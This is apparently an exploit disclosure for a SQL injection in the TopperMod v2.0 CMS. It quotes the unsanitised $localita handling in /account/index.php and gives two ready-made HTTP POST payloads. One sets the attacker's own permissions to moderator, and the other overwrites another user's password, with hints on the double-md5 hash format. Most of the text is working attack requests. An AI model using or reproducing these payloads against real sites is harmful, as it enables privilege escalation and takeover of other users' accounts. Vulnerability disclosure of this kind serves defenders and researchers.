Author: GiReX
CMS: TopperMod v2.0
Bug: SQL Injection
Type: 1 - Priviledge Escalation (from user to mod)
2 - Remote user password change
File: /account/index.php
Var : $localita
Need: magic_quotes_gpc = Off
You must be logged in
Vuln Code: /account/index.php:
case "edituser_save":
...
$localita=$_POST['localita'];
...
if ($localita!="") {
if (eregi("^[a-zA-Z0-9]",$localita)) {
$localita=substr(htmlentities(htmlspecialchars($localita), ENT_QUOTES),0,20);
}
}
And if our $_POST['localita'] does not begin with a char or a number?
Input not sanizated
...
$res=dbquery("UPDATE ".PREFISSO."_utenti SET email='$email', localita='$localita', sito='$sito',
tema='$tema_user', time_zone='$time_zone' $pass
WHERE user_id='$user_id' ");
Vulnerable query :D
PoC 1:
POST /[PATH]/mod.php?mod=account HTTP/1.1
Host: [TARGET]
...headers...
[email protected]&localita=@', permessi='1&go=edituser_save&user_id=[YOUR_USER_ID]
PoC 2:
POST /[PATH]/mod.php?mod=account HTTP/1.1
Host: [TARGET]
...headers...
[email protected]&localita=@', password='[PASSWORD]&go=edituser_save&user_id=[VICTIM_USER_ID]
Note: [PASSWORD] must be the md5 of the md5 of the wanted password, you must forget in the content the end quote
We can also try to get admin hash trought sql subqueries but the password is crypted into md5 2 times
and Admins don't use cookies in this CMS…